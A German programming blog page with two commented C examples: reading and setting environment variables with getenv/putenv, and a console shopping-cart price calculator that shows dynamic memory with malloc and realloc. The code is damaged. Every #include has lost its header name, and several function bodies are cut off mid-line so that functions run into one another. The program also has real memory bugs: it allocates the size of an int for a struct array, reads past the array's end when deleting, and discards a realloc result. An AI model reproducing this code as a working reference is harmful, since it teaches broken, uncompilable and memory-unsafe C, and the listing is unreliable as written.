C-Programm – Umgebungsvariablen unter Linux

In dem Buch „Linux Programmierung“ habe ich ein schönes Beispiel für Umgebungsvariablen unter Linux gefunden, welches ich gerade ein wenig Kommentiert habe… :-)

„Beachten Sie, dass sich die Umgebung nur lokal zum Programm verhält. Änderungen, die innerhalb des Programmes durchgeführt werden, werden nicht nach außen reflektiert, da Variablenwerte nicht vom untergeordneten Prozess (unser Programm) an den übergeordneten Prozess (die Shell) propagiert werden.“ – Seite 166

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* argc -> Anzahl Kommandozeilenparameter + Programmnamen (1), somit ist der Wert min. 1 */
 
/* argv -> ist ein Zeiger auf das Feld (Array) mit der in argc angegebene Anzahl von Elementen...
	... und die Elemente (z.B.: argc[0] sind Zeiger auf eine Zeichenkette...
 
	arg[0] -> Programmname
	arg[1] -> 1. Parameter 
	arg[2] -> 2. Parameter
	[...]
	arg[n] -> letzter Parameter
	0L    -> das letzte Element von argv[] einthaelt eine Null
*/
int main(int argc, char *argv[]) {
	char *var, *value;

	// wenn kein oder mehr als 3 Parameter uebergeben wurden, dann ...
	if (argc == 1 || argc > 3) {
			// Fehlermeldung ausgeben und Programm beenden
			fprintf(stderr,"usage: environ var [value]\n");
			exit(1);
	}

	// 1. Parameter in die Variable "var" schreiben
	var = argv[1];
	// mit getenv den Wert der Umgebungsvariablen abrufen 
	// und in die Variable "value" schreiben
	value = getenv(var);
	// wenn value wahr bzw. vorhanden ist, dann ...
	if (value) {
			printf("Variable %s has value %s\n", var, value);
	// ... ansonsten ...
	} else {
			printf("Variable %s has no value\n", var);
	}

	// wenn 2. Parameter uebergeben wurden, dann ...
	if (argc == 3) {
		char *string;
		// 2. Parameter in die Variable "value" schreiben
		value = argv[2];
		// Speicherbereich fuer die Umgebungsvariablen + Wert anlegen
		string = malloc(strlen(var)+strlen(value)+2);
		// wenn string nicht wahr bzw. nicht vorhanden ist, dann ...
		if(!string) {
				// Fehlermeldung ausgeben und Programm beenden
				fprintf(stderr,"out of memory\n");
				exit(1);
		}
		// strcpy - Stringfunktion zum kopieren einer Zeichenkette (string <- var)
		strcpy(string,var);
		// strcat - Stringfunktion zum verketten von Strings (string=) 
		strcat(string,"=");
		// strcat - Stringfunktion zum verketten von Strings (string=value)
		strcat(string,value);
		printf("Calling putenv with: %s\n", string);
		//
		// putenv - Aendert oder setzt eine Umgebungsvariable, gibt -1 bei einem Fehler 
		// und 0 bei keinem Fehler aus 
		//
		// wenn nicht gleich 0 -> wenn ein Fehler aufgetreten ist , dann ...
		if (putenv(string) != 0) {
				// Fehlermeldung ausgeben, Speicher wieder freigeben und Programm beenden
				fprintf(stderr,"putenv failed\n");
				free(string);
				exit(1);
		}

		// den Wert der Umgebungsvariablen in der Variablen "var"
		// in die Variable "value" schreiben
		value = getenv(var);
		// wenn value gleich wahr bzw. gesetzt, dann ...
		if (value) {
				// Umgebungsvariablen + neuen Wert ausgeben
				printf("New value of %s is %s\n", var, value);
		// ... ansonsten ...
		} else {
				// Umgebungsvariablen + ? ausgeben
				printf("New value of %s is null??\n", var);
		}
	}
exit(0);
}

C-Programm – Dynamische Speicherverwaltung

In diesem Beispiel zeigt ich, wie man Speicher dynamisch anlegen bzw. verwalten kann …

/*
============================================================================
Autor          : Lars Moelleken
Datum          : 10.02.2011
Beschreibung   : Preiskalkulation
Version        : 1.0
Compiler       : gcc 4.6.2-12
Programmschnittstelle: int main(void)
Das Programm gibt den Wert 0 oder 1 zurück.
Es werden keine Argumente erwartet.
============================================================================
*/

/*
============================================================================
Praeprozessoranweisungen
============================================================================
*/
#include 
#include 
#include 
#include 
#if defined __linux__
#include 
#elif defined _WIN32 || defined _WIN64
#define false 0
#define true 1
#endif

#define FUNSTAR_PREIS 1243.43
#define FUNSTAR_NAME "Fun Star"
#define HIGHEND_PREIS 1658.50
#define HIGHEND_NAME "High End"
#define MULTIMEDIASTAR_PREIS 698.20
#define MULTIMEDIASTAR_NAME "Multimedia Star"
#define OFFICESTAR_PREIS 1015.39
#define OFFICESTAR_NAME "Office Star"
#define GEHAEUSE_NAME "Gehaeuse"
#define LX100_PREIS 97.05
#define LX100_NAME "Compucase LX100 weiss"
#define LX120_PREIS 68.89
#define LX120_NAME "Compucase LX120 schwarz"
#define LX34A_PREIS 103.60
#define LX34A_NAME "Compucase LX34A weiss"
#define MAINBOARD_PREIS 193.03
#define MAINBOARD_NAME "Mainboard"
#define CPU_PREIS 334.65
#define CPU_NAME "CPU"
#define FESTPLATTEN_PREIS 130.95
#define FESTPLATTEN_NAME "Festplatte"
#define GRAFIKKARTEN_PREIS 319.13
#define GRAFIKKARTEN_NAME "Grafikkarte"

// die Struktur existiert nach der Deklaration als neuer Datentyp
// per typedef kann ein Synonym fuer die Strucktur erstellt werden 
typedef struct 
{
   char *pcKundenname, *pcProduktname;
   int iKundenNr, iProduktanzahl, iLieferung, iMontage;
   double dPreis;
} kunden;

/*
============================================================================
Funktionsprototypen
============================================================================
*/
// neuer Datentyp "kunden" wird hier direkt verwendent
kunden* datenEinlesen(kunden *s,int *iAnzahl, char *pcKundenname, 
   char *pcProduktname, int iKundenNr, int iProduktanzahl,
   int iLieferung,int iMontage,double dPreis);
int cls(void);
int new_fflush(void);
int InArray(int x, int iArray[], int iSize);
int loeschen(kunden *s, int *iAnzahl, int i);
double berechnungPreis(double dInputPreis, int iLieferung,
   int iMontage, int iAusgabe);
int ausgabeWarenkorb(kunden *s, int iAnzahl);
int ausgabeGesamtpreis(kunden *s, int iAnzahl);
int sucheNachKundenNr(kunden *s, int iAnzahl, int iKundenNr);
int sucheNachName(kunden *s, int iAnzahl, char *pcKundenname);
char *readKundenName(kunden *s, int iAnzahl, int iKundenNr);
int readProduktanzahl(void);
int readMontage(void);
int readLieferung(void);
int readKundenNr(void);
int printMenu(void);
int printMenuStandard(void);
int printMenuEinzel(void);
int printMenuGehaeuse(void);

/*
============================================================================
Funktion main() - Hauptfunktion
============================================================================
*/
int main(void)
/*
Rückgabewert:    0 ==> alles OK
                 1 ==> es ist ein Fehler aufgetreten
Es werden keine Argumente übergeben!
*/
{
   char cNamePuffer[100], cProduktPuffer[100], cInput;
   int iAnzahl=0, i, iKundenNr, inputStandard, auswahl, iProduktanzahl, 
      iShowMenu=true, iLieferung=false, iMontage=false;
   double dPreis;
 
   // Zeiger auf einen Eintrag definieren 
   kunden *s;
   // neuen Speicherbereich fuer die Struktur "kunden" anlegen
   s = (kunden*) malloc(sizeof(iAnzahl));
   // falls kein Speicherplatz zur Verfuegung steht ...
   if (s == NULL)
   {
      printf("Fehler: .......Speicherplatzmangel\n");
      exit(1);
   }
 
   // solange bis '0' eingegeben wird ...
   do 
   {
      if (iShowMenu == 1) 
      {
         cls();
         // Ausgabe vom Warenkorb
         ausgabeGesamtpreis(s,iAnzahl);
         // Ausgabe vom Menue
         printMenu();
      }  
      // Eingabe
      scanf("%c", &cInput);
      new_fflush();
      // Auswahl zur Eingabe 
      switch (cInput) 
      {
         // Einlesen
         case 'a': case 'A':
            iShowMenu=false;
            // i = 1 => true
            i = 1;
            // solange i = true ...
            while (i == true)
            {
               do
               {
                  cls();
                  // Ausgabe vom Warenkorb
                  ausgabeGesamtpreis(s,iAnzahl);
                  // Ausgabe vom MenueStadard
                  printMenuStandard();
                  scanf("%d", &inputStandard);
                  new_fflush();
               } 
               while (inputStandard != 0 && 
               		 inputStandard != 1 && 
               		 inputStandard != 2 && 
               		 inputStandard != 3 && 
               		 inputStandard != 4);
               // Auswahl zur Eingabe 
               switch (inputStandard) 
               {
                  case 1:
                     dPreis=FUNSTAR_PREIS;
                     strncpy(cProduktPuffer,FUNSTAR_NAME,
                     		 strlen(FUNSTAR_NAME) +1);
                     break;
                  case 2:
                     dPreis=HIGHEND_PREIS;
                     strncpy(cProduktPuffer,HIGHEND_NAME,
                     		 strlen(HIGHEND_NAME) +1);
                     break;
                  case 3:
                     dPreis=MULTIMEDIASTAR_PREIS;
                     strncpy(cProduktPuffer,MULTIMEDIASTAR_NAME,
                     		 strlen(MULTIMEDIASTAR_NAME) +1);
                     break;
                  case 4:
                     dPreis=OFFICESTAR_PREIS;
                     strncpy(cProduktPuffer,OFFICESTAR_NAME,
                     		 strlen(OFFICESTAR_NAME) +1);
                     break;
                  default:
                     dPreis=0;
                     // i = 0 => false => while-Schleife wird verlassen
                     i=false;
                     cls();
                     iShowMenu=true;
                     break;
               }
               if (dPreis != 0)
               {
                  iKundenNr=readKundenNr();
                  strcpy(cNamePuffer,readKundenName(s, iAnzahl, iKundenNr));
                  iProduktanzahl=readProduktanzahl();
                  iLieferung=readLieferung();

                  cls();
                  berechnungPreis(dPreis, iLieferung, iMontage, 1);

                  printf("\n\nIn den Warenkorb? ('j' fuer ja) ");
                  // Einlesen von cInput
                  scanf("%c", &cInput);
                  new_fflush();
                  printf("\n\n");
                  // wenn Eingabe ungleich j ist, dann ...
                  if (cInput == 'j') 
                  {
                     // Speicher wird per Funktion (datenEinlesen) erstellt
                     s = datenEinlesen(s,&iAnzahl,cNamePuffer,cProduktPuffer,
                     		 iKundenNr,iProduktanzahl,iLieferung,iMontage,dPreis);

                     printf("\n**Eintrag gespeichert**\n");
                     printf("\n\tweiteren Eintrag anlegen? ('j' fuer ja) ");
                  }
                  else
                  {
                     printf("\n\tanderen Eintrag anlegen? ('j' fuer ja) ");
                  }

                  // Einlesen von cInput
                  scanf("%c", &cInput);
                  new_fflush();
                  printf("\n\n");
                  // wenn Eingabe ungleich j ist, dann ...
                  if (cInput != 'j') 
                  {
                     // i = 0 => false => while-Schleife wird verlassen
                     i=false;
                     cls();
                     iShowMenu=true;
                  }
                  else
                  {
                     cls();
                     iShowMenu=false;
                  }
               }
            }
            // beendet eine Schleife bzw. eine case-Anweisung 
            break;
         // Einlesen
         case 'b': case 'B':
            cls();
            iShowMenu=false;
            // i = 1 => true
            i = true;
            // solange i==true ...
            while (i == true)
            {
               do
               {
                  cls();
                  // Ausgabe vom Warenkorb
                  ausgabeGesamtpreis(s,iAnzahl);
                  // Ausgabe vom MenueStadard
                  printMenuEinzel();
                  scanf("%d", &inputStandard);
                  new_fflush();
               } 
               while (inputStandard != 0 && 
               		 inputStandard != 1 && 
               		 inputStandard != 2 && 
               		 inputStandard != 3 && 
               		 inputStandard != 4 && 
               		 inputStandard != 5);
               // Auswahl zur Eingabe 
               switch (inputStandard) 
               {
                  case 1:
                     // i = 0 => false => while-Schleife wird verlassen
                     i=false;
                     do
                     {
                        cls();
                        // Ausgabe vom Warenkorb
                        ausgabeGesamtpreis(s,iAnzahl);
                        // Ausgabe vom MenueStadard
                        printMenuGehaeuse();
                        scanf("%d", &inputStandard);
                        new_fflush();
                     } 
                     while (inputStandard != 0 && 
                     		 inputStandard != 1 && 
                     		 inputStandard != 2 && 
                     		 inputStandard != 3);
                     // Auswahl zur Eingabe 
                     switch (inputStandard)
                     {
                        case 1:
                           dPreis=LX100_PREIS;
                           strncpy(cProduktPuffer,LX100_NAME,
                           		 strlen(LX100_NAME) +1);
                           break;
                        case 2:
                           dPreis=LX120_PREIS;
                           strncpy(cProduktPuffer,LX120_NAME,
                           		 strlen(LX120_NAME) +1);
                           break;
                        case 3:
                           dPreis=LX34A_PREIS;
                           strncpy(cProduktPuffer,LX34A_NAME,
                           		 strlen(LX34A_NAME) +1);
                           break;
                        default:
                           dPreis=0;
                           // i = 0 => false => while-Schleife wird verlassen
                           i=false;
                           cls();
                           iShowMenu=true;
                           break;
                     }
                     break;
                  case 2:
                     dPreis=MAINBOARD_PREIS;
                     strncpy(cProduktPuffer,MAINBOARD_NAME,
                     		 strlen(MAINBOARD_NAME) +1);
                     break;
                  case 3:
                     dPreis=CPU_PREIS;
                     strncpy(cProduktPuffer,CPU_NAME,
                     		 strlen(CPU_NAME) +1);
                     break;
                  case 4:
                     dPreis=FESTPLATTEN_PREIS;
                     strncpy(cProduktPuffer,FESTPLATTEN_NAME,
                     		 strlen(FESTPLATTEN_NAME) +1);
                     break;
                  case 5:
                     dPreis=GRAFIKKARTEN_PREIS;
                     strncpy(cProduktPuffer,GRAFIKKARTEN_NAME,
                     		 strlen(GRAFIKKARTEN_NAME) +1);
                     break;
                  default:
                     dPreis=0;
                     // i = 0 => false => while-Schleife wird verlassen
                     i=false;
                     cls();
                     iShowMenu=true;
                     break;
               }
               if (dPreis != 0)
               {
                  iKundenNr=readKundenNr();
                  strcpy(cNamePuffer,readKundenName(s, iAnzahl, iKundenNr));
                  iProduktanzahl=readProduktanzahl();
                  iLieferung=readLieferung();
                  iMontage=readMontage();
 
                  cls();
                  berechnungPreis(dPreis, iLieferung, iMontage, 1);

                  printf("\n\nIn den Warenkorb? ('j' fuer ja) ");
                  // Einlesen von cInput
                  scanf("%c", &cInput);
                  new_fflush();
                  printf("\n\n");
                  // wenn Eingabe ungleich j ist, dann ...
                  if (cInput == 'j') 
                  {
                     // Speicher wird per Funktion (datenEinlesen) erstellt
                     s = datenEinlesen(s,&iAnzahl,cNamePuffer,cProduktPuffer,
                     		 iKundenNr,iProduktanzahl,iLieferung,iMontage,dPreis);

                     printf("\n**Eintrag gespeichert**\n");
                     printf("\n\tweiteren Eintrag anlegen? ('j' fuer ja) ");
                  }
                  else
                  {
                     printf("\n\tanderen Eintrag anlegen? ('j' fuer ja) ");
                  }

                  // Einlesen von cInput
                  scanf("%c", &cInput);
                  new_fflush();
                  printf("\n\n");

                  // wenn Eingabe ungleich j ist, dann ...
                  if (cInput != 'j') 
                  {
                     // i = 0 => false => while-Schleife wird verlassen
                     i=false;
                     cls();
                     iShowMenu=true;
                  }
                  else
                  {
                     cls();
                     iShowMenu=false;
                  }
               }
            }
            // beendet eine Schleife bzw. eine case-Anweisung 
            break;
         // Ausgabe
          case 'c': case 'C':
            cls();
            iShowMenu=false;
            // wenn Anzahl gleich 0, dann ...
            if (iAnzahl==0) 
            {
               printf("\n\n**Kein Eintrag gefunden**\n\n");
            } 
            else 
            {
               ausgabeWarenkorb(s,iAnzahl);
            }
            printf("\ndrueke 'Enter' um fortzufahren: ...\n");
            if (getchar() == '\n')
            {
               cls();
               iShowMenu=true;
            }
            // beendet eine Schleife bzw. eine case-Anweisung 
            break;
         // Nach Kunden-Namen suchen
         case 'd': case 'D':
            cls();
            iShowMenu=false;
            printf("Suchen (Kunden-Name): ");
            // Einlesen von cNamePuffer (pcKundenname)
            scanf("%99s", cNamePuffer);
            new_fflush();
            // Funktion wird aufgerufen 
            sucheNachName(s,iAnzahl,cNamePuffer);
            printf("\ndrueke 'Enter' um fortzufahren: ...\n");
            if (getchar() == '\n')
            {
               cls();
               iShowMenu=true;
            }
            // beendet eine Schleife bzw. eine case-Anweisung 
            break;
         // Nach Kunden-Nr. suchen
         case 'e': case 'E':
            cls();
            iShowMenu=false;
            printf("Suchen (Kunden-Nr.): ");
            // Einlesen von iKundenNr
            scanf("%d",&iKundenNr);
            new_fflush();
            // Funktion wird aufgerufen 
            sucheNachKundenNr(s,iAnzahl,iKundenNr);
            printf("\ndrueke 'Enter' um fortzufahren: ... \n");
            if (getchar() == '\n')
            {
               cls();
               iShowMenu=true;
            }
            // beendet eine Schleife bzw. eine case-Anweisung 
            break;
         // Einen Eintrag löschen
         case 'f': case 'F':
            cls();
            iShowMenu=false;
            printf("Loeschen: ");
            i=true;
            while (i == true) 
            {
               if (iAnzahl != 0) 
               {
                  for (i=0; i != iAnzahl; i++) 
                  {
                     printf("\n\t---------------------------------------");
                     printf("\n\tIndex: %d -> Kunde: %s (%d)", i, 
                     		 s[i].pcKundenname, s[i].iKundenNr);
                     printf("\n\t---------------------------------------");
                  }
                  printf("\n\nIndex angeben: ");
                  scanf("%d",&auswahl);
                  new_fflush();
                  if (auswahl < 0 || auswahl >= iAnzahl) 
                  {
                     cls();
                     printf("\nungueltige Eingabe\n\n");
                  } 
                  else 
                  {
                     printf("\n\tEintrag wirklich loeschen? ('j' fuer ja) ");
                     // Einlesen von cInput
                     scanf("%c", &cInput);
                     new_fflush();
                     printf("\n\n");

                     // wenn Eingabe gleich j ist, dann ...
                     if (cInput == 'j') 
                     {
                        loeschen(s,&iAnzahl,auswahl);
                        i=false;
                           printf("\n\n**Eintrag geloescht !**\n\n");
                     }
                     else
                     {
                        // i = 0 => false => while-Schleife wird verlassen
                        i=false;
                        iShowMenu=true;
                     }

                  }
               } 
               else 
               {
                  i=false;
                  printf("\n\n**Kein Eintrag gefunden**\n\n");
               }
               printf("\ndrueke 'Enter' um fortzufahren: ... \n");
               if (getchar() == '\n')
               {
                  cls();
                  iShowMenu=true;
               }
            }
            // beendet eine Schleife bzw. eine case-Anweisung 
            break;
         // Speicher wieder freigeben (free)
         case 'x': case 'X':
            for (i=0; i != iAnzahl; i++) 
            {
               // "free" gibt den Speicher wieder frei
               free(s[i].pcKundenname);
            }
            // testing
            //free(s);
            // Alternative schreibweise:
            // realloc(s,0);
            // beendet eine Schleife bzw. eine case-Anweisung
            break;
         // Standard 
         default:
            iShowMenu=true;
            break;
      }
   // solange in der Schleife bleiben, bis 0 eingegeben wird 
   } 
   while (cInput != 'x' && cInput != 'X');
 
   return 0;
}

/*
============================================================================
Funktion datenEinlesen() - der Speicher wird bereitgestellt und die Eingaben 
               an die Strucktur uebergeben
============================================================================
*/
kunden* datenEinlesen(kunden *s, int *iAnzahl, char *pcKundenname,
   char *pcProduktname, int iKundenNr, int iProduktanzahl,
   int iLieferung, int iMontage, double dPreis)
/*
Rückgabewert:    s ==> neuen Speicherbereich
Argumente:    *s ==> Zeiger auf den neuen Speicherbereich
      *iAnzahl ==> Zeiger auf die Anzahl an Eintraegen
      *pcKundenname ==> Zeiger auf den Kunden-Namen
      *pcProduktname ==> Zeiger auf den Produkt-Namen 
      iKundenNr ==> Kunden-Nr.
      iProduktanzahl ==> Anzahl vom bestellten Produkten
      iLieferung ==> Lieferung (1=ja || 0=nein)
      iMontage ==> Montage (1=ja || 0=nein)
      dPreis ==> Preis pro Produkt
*/
{
   //
   // realloc() -    kann Speicherplatz von einem bereits zugeteilten 
   //      Blocks vergroeßern oder verkleinern, dazu wird ein 
   //      Zeiger auf die Anfangsadresse des neu reservierten 
   //      Speicherblocks gesetzt, dabei bleibt der Inhalt des 
   //      urspruenglichen Speicherblocks erhalten und der neue 
   //      Speicherblock wird hinten angefuegt
   //
   // Speicherbereich wird vergroeßert
   s=(kunden*)realloc(s,sizeof(kunden)*(*iAnzahl +1));
   //
   // strlen -    gibt die Anzahl der Zeichen eines Strings 
   //      ohne das Null-Zeichen zurueck
   // strcpy -    Stringfunktion zum kopieren einer Zeichenkette       
   //
   // malloc() -    reserviert genau so viel zusammenhaengenden Speicher, 
   //      wie angegeben wird, zurueckgegeben wird ein typenloser 
   //      Zeiger auf void mit der Anfangsadresse des 
   //      Speicherbereichs
   //
   // z.B.: 
   // Speicher fuer 100 int-Elemente reservieren 
   // ptr = malloc(100 * sizeof(int));
   // ...
   // Speicher auf 50 int-Elemente verkleinern 
   // ptr = realloc(ptr, 50 * sizeof(int));
   // ...
   // Speicher von 256 auf 512 int-Elemente vergroeßern 
   // int block = 256;
   // ptr = malloc(block * sizeof(int));
   // block += block;
   // ptr = reallloc(ptr, block * sizeof(int));
   //
   // neuen Speicherbereich fuer einen neuen Namen anlegen
   // +1 wegen \0 -> am Ende vom String
   s[*iAnzahl].pcKundenname=(char*) malloc(strlen(pcKundenname) +1); 
   // falls kein Speicherplatz zur Verfuegung steht ...
   if (s[*iAnzahl].pcKundenname == NULL) 
   {
      printf("Fehler: .......Speicherplatzmangel\n");
      exit(1);
   }
   // der Strucktur (kunden) wird die Variable "pcKundenname" hinzugefuegt 
   strncpy(s[*iAnzahl].pcKundenname,pcKundenname,strlen(pcKundenname) +1);
   // der Strucktur (kunden) wird die Variable "iKundenNr" hinzugefuegt
   s[*iAnzahl].iKundenNr=iKundenNr;
   // neuen Speicherbereich fuer einen neuen Produktnamen anlegen
   // +1 wegen \0 -> am Ende vom String
   s[*iAnzahl].pcProduktname=(char*) malloc(strlen(pcProduktname) +1);
   // falls kein Speicherplatz zur Verfuegung steht ...
   if (s[*iAnzahl].pcProduktname == NULL) 
   {
      printf("Fehler: .......Speicherplatzmangel\n");
      exit(1);
   }
   // der Strucktur (kunden) wird die Variable "pcProduktname" hinzugefuegt 
   strncpy(s[*iAnzahl].pcProduktname,pcProduktname,strlen(pcProduktname) +1);
   // der Strucktur (kunden) wird die Variable "iProduktanzahl" hinzugefuegt   
   s[*iAnzahl].iProduktanzahl=iProduktanzahl; 
   // der Strucktur (kunden) wird die Variable "iLieferung" hinzugefuegt   
   s[*iAnzahl].iLieferung=iLieferung;
   // der Strucktur (kunden) wird die Variable "iMontage" hinzugefuegt   
   s[*iAnzahl].iMontage=iMontage;
   // der Strucktur (kunden) wird die Variable "dPreis" hinzugefuegt 
   s[*iAnzahl].dPreis=dPreis;
   // die Anzahl der Kunden um 1 erhoehen
   ++*iAnzahl;
   return s;
}

/*
============================================================================
Funktion cls() - clear
============================================================================
*/
int cls(void)
/*
Rückgabewert:    0 ==> alles OK
Es werden keine Argumente übergeben!
*/
{
#if defined __linux__
   printf("\033[2J");
#elif defined _WIN32 || defined _WIN64
   system("cls");
#endif
   return 0;
}

/*
============================================================================
Funktion new_fflush() - fflush(stdin) for Linux and Windows
============================================================================
*/
int new_fflush(void)
/*
Rückgabewert:    0 ==> alles OK
Es werden keine Argumente übergeben!
*/
{
#if defined __linux__
   int ch;
   while ((ch = getchar()) != '\n' && ch != EOF);                  
#elif defined _WIN32 || defined _WIN64
   fflush(stdin);
#endif
   return 0; 
}

/*
============================================================================
Funktion InArray() - check if 'x' in the 'iArray'
============================================================================
*/
int InArray(int x, int iArray[], int iSize)
/*
Rückgabewert:    inArray ==> is in Array or not ;)
Argumente:   x ==> checking 'x'
      iArray[] ==> in this iArray
      iSize ==> iSize of the iArray
*/
{
   // default is "false"
   int inArray=false;
   int i;
   for (i=0; i alles OK
Argumente:   *s ==> Zeiger auf den neuen Speicherbereich
      *iAnzahl ==> Zeiger auf die Anzahl an Eintraegen
      i ==> Auswahl des Indexes 
*/
{
   // solange Index nicht Anzahl ist ...
   for (i; i != *iAnzahl; i++) 
   {
      // Strucktur-Eintraege um 1 erhoehen
      s[i].pcKundenname=s[i+1].pcKundenname;
      s[i].iKundenNr=s[i+1].iKundenNr;
      s[i].pcProduktname=s[i+1].pcProduktname;
      s[i].iProduktanzahl=s[i+1].iProduktanzahl;
      s[i].iLieferung=s[i+1].iLieferung;
      s[i].iMontage=s[i+1].iMontage;
      s[i].dPreis=s[i+1].dPreis;
   }
   // Anzahl -1 
   --*iAnzahl;
   // Speicherbereich wird verkleinert
   s=(kunden*) realloc(s,sizeof(kunden) * (*iAnzahl));
   return 0;
}

// Funktion: berechnungPreis
double berechnungPreis(double dInputPreis, int iLieferung,
		int iMontage, int iAusgabe)
{
   // Ausgabe ...
   if (iAusgabe == 1) 
   {
      printf("\n\n\tListenpreis pro Artikel:\t%7.2lf", dInputPreis);
      printf("\n\t\t+ Lagerkosten:\t\t%7.2lf", dInputPreis * 0.1);
   }
   dInputPreis = dInputPreis + (dInputPreis  * 0.1);
   if (iAusgabe == 1) 
   {
      printf("\n\t---------------------------------------");
      printf("\n\tMaterialkosten:\t\t\t%7.2lf", dInputPreis);
      printf("\n\t\t+ Verwaltungskosten:\t%7.2lf", dInputPreis * 0.1);
   }
   dInputPreis = dInputPreis + (dInputPreis * 0.1);
   if (iAusgabe == 1) 
   {
      printf("\n\t---------------------------------------");
      printf("\n\tSelbstkosten:\t\t\t%7.2lf", dInputPreis);
      printf("\n\t\t+ Gewinn:\t\t%7.2lf", dInputPreis * 0.1);
   }
   dInputPreis = dInputPreis + (dInputPreis * 0.1);
   if (iAusgabe == 1) 
   {
      printf("\n\t---------------------------------------");
      printf("\n\tBarverkaufspreis:\t\t%7.2lf", dInputPreis);
   }
   if (iLieferung == 1)
   {
      if (iAusgabe == 1) 
      {
         printf("\n\t\t+ Versand:\t\t%7.2lf", dInputPreis * 0.05);
      }
      dInputPreis = dInputPreis + (dInputPreis * 0.05);
      if (iAusgabe == 1) 
      {
         printf("\n\t---------------------------------------");
         printf("\n\tVersandpreis:\t\t\t%7.2lf", dInputPreis);
      }
   }
   if (iMontage == 1)
   {
      if (iAusgabe == 1) 
      {
         printf("\n\t\t+ Montage:\t\t%.2lf", dInputPreis * 0.15);
      }
      dInputPreis = dInputPreis + (dInputPreis * 0.15);
      if (iAusgabe == 1) 
      {
         printf("\n\t---------------------------------------");
         printf("\n\tHerstellungskosten:\t\t%7.2lf", dInputPreis);
      }
   }
   return dInputPreis;
}

/*
============================================================================
Funktion ausgabeWarenkorb() - Warenkorb ausgeben
============================================================================
*/
int ausgabeWarenkorb(kunden *s, int iAnzahl) 
/*
Rückgabewert:    0 ==> alles OK
Argumente:   *s ==> Zeiger auf den neuen Speicherbereich
      iAnzahl ==> Anzahl an Eintraegen
*/
{
   int i, iArray[100];
   double gesamtpreis[100], dPreis[100];
   printf("\nWarenkorb (Einzelpreise):\n");
   // von 0 bis Anzahl ...
   for (i=0; i alles OK
Argumente:   *s ==> Zeiger auf den neuen Speicherbereich
      iAnzahl ==> Anzahl an Eintraegen
*/
{
   int i;
   double gesamtpreis=0, dPreis[32];
   // von 0 bis Anzahl ...
   for (i=0; i alles OK
      1 ==> es ist ein Fehler aufgetreten
Argumente:   *s ==> Zeiger auf den neuen Speicherbereich
      iAnzahl ==> Anzahl an Eintraegen
      iKundenNr ==> Kunden-Nr.
*/
{
   int i,x=false;
   double dPreis[100];
   // von 0 bis Anzahl ...
   for (i=0;i != iAnzahl; i++) 
   {
      // wenn der Eintrag gleich dem Suchbegriff ist ...
      if (s[i].iKundenNr==iKundenNr) 
      {
         dPreis[i] = berechnungPreis(s[i].dPreis, s[i].iLieferung,
         		 s[i].iMontage, 0);
         dPreis[i] = dPreis[i] * s[i].iProduktanzahl;
         printf("\n(Index: %3d)\nKunde: %s\nKunden-Nr: %d\nProdukt: %s\n"
         		 "Preis: %.2lf\n\n",i,s[i].pcKundenname,s[i].iKundenNr,
         		 s[i].pcProduktname,dPreis[i]);
         // x=1 -> Eintrag gefunden
         x=true;
      }
   }
   // wenn Eintrag nicht gefunden wurde, dann ...
   if (x==false) 
   {
      printf("\n\n**Kein Eintrag gefunden**\n\n");
      return 1;
   }
   else
   {
      return 0;
   }
}

/*
============================================================================
Funktion sucheNachName() - Infos ueber eine bestimmten Kunden-Namen
============================================================================
*/
int sucheNachName(kunden *s, int iAnzahl, char *pcKundenname)
/*
Rückgabewert:    0 ==> alles OK
      1 ==> es ist ein Fehler aufgetreten
Argumente:   *s ==> Zeiger auf den neuen Speicherbereich
      iAnzahl ==> Anzahl an Eintraegen
      *pcKundenname ==> Kunden-Name
*/
{
   int i,x=false;
   double dPreis[100];
   // von 0 bis Anzahl ...
   for (i=0;i != iAnzahl;i++) 
   {
      // Vergleich (strcmp) von char-Arrays bzw. String
      if ( !strcmp(pcKundenname,s[i].pcKundenname) ) 
      {
         dPreis[i] = berechnungPreis(s[i].dPreis, s[i].iLieferung,
         		 s[i].iMontage, 0);
         printf("\n(Index: %3d)\nKunde: %s\nKunden-Nr: %d\nProdukt: %s\n"
         		 "Preis: %.2lf\n\n",i,s[i].pcKundenname,s[i].iKundenNr,
         		 s[i].pcProduktname,dPreis[i]);
         // x=1 -> Eintrag gefunden
         x=true;
      }
   }
   // wenn Eintrag nicht gefunden wurde, dann ...
   if (x==false) 
   {
      printf("\n\n**Kein Eintrag gefunden**\n\n");
      return 1;
   }
   else
   {
      return 0;
   }
}

/*
============================================================================
Funktion readKundenName() - scanf with check
============================================================================
*/
char *readKundenName(kunden *s, int iAnzahl, int iKundenNr)
/*
Rückgabewert:    cNamePuffer ==> Kunden-Name
Argumente:   *s ==> Zeiger auf den neuen Speicherbereich
      iAnzahl ==> Anzahl an Eintraegen
      iKundenNr ==> Kunden-Nr.
*/
{
   int check=true, i;
   static char cNamePuffer[100];
   if (iAnzahl != 0) 
   {
      for (i=0; i != iAnzahl; i++) 
      {
         if (s[i].iKundenNr == iKundenNr)
         {
            strncpy(cNamePuffer,s[i].pcKundenname,
            		strlen(s[i].pcKundenname) +1);
            check=false;
         }
      }
   }
   if (check==true)
   {
      do 
      {
         printf("\tKunde (Name): ");
         // Einlesen von cNamePuffer (pcKundenname)
         scanf("%99s", cNamePuffer);
         new_fflush();
         if (!isalpha(cNamePuffer[0]))
         {
            printf("\n\n**Bitte einen korrekten Namen eingeben!!!**\n\n");
         }
      } 
      while (!isalpha(cNamePuffer[0]));
   }
   return cNamePuffer;
}

/*
============================================================================
Funktion readProduktanzahl() - scanf with check
============================================================================
*/
int readProduktanzahl(void)
/*
Rückgabewert:    iProduktanzahl ==> Produktanzahl
Es werden keine Argumente übergeben!
*/
{
   int check=true, iProduktanzahl;
   check=true;
   do 
   {
      printf("\tAnzahl: ");
      // Einlesen der Produktanzahl
      check = !scanf("%d", &iProduktanzahl);
      new_fflush();
      if (check)
      {
         printf("\n\n**Bitte eine korrekte Produktanzahl eingeben!!!**\n\n");
      }
   } 
   while (check);
   return iProduktanzahl;
}

/*
============================================================================
Funktion readLieferung() - scanf with check
============================================================================
*/
int readMontage(void)
/*
Rückgabewert:    iMontage ==> Montage (1 | 0)
Es werden keine Argumente übergeben!
*/
{
   int iMontage=0;
   char cInput;
   do 
   {
      printf("\tMontage: ('j' fuer ja) ");
      // Einlesen der Montage
      scanf("%c", &cInput);
      new_fflush();
      if (!isalpha(cInput))
      {
         printf("\n**Bitte eine korrekte Eingabe taetigen!!!**\n");
      }
   } 
   while (!isalpha(cInput));
   if (cInput == 'j') 
   {
      iMontage=true;
   }
   return iMontage;
}

/*
============================================================================
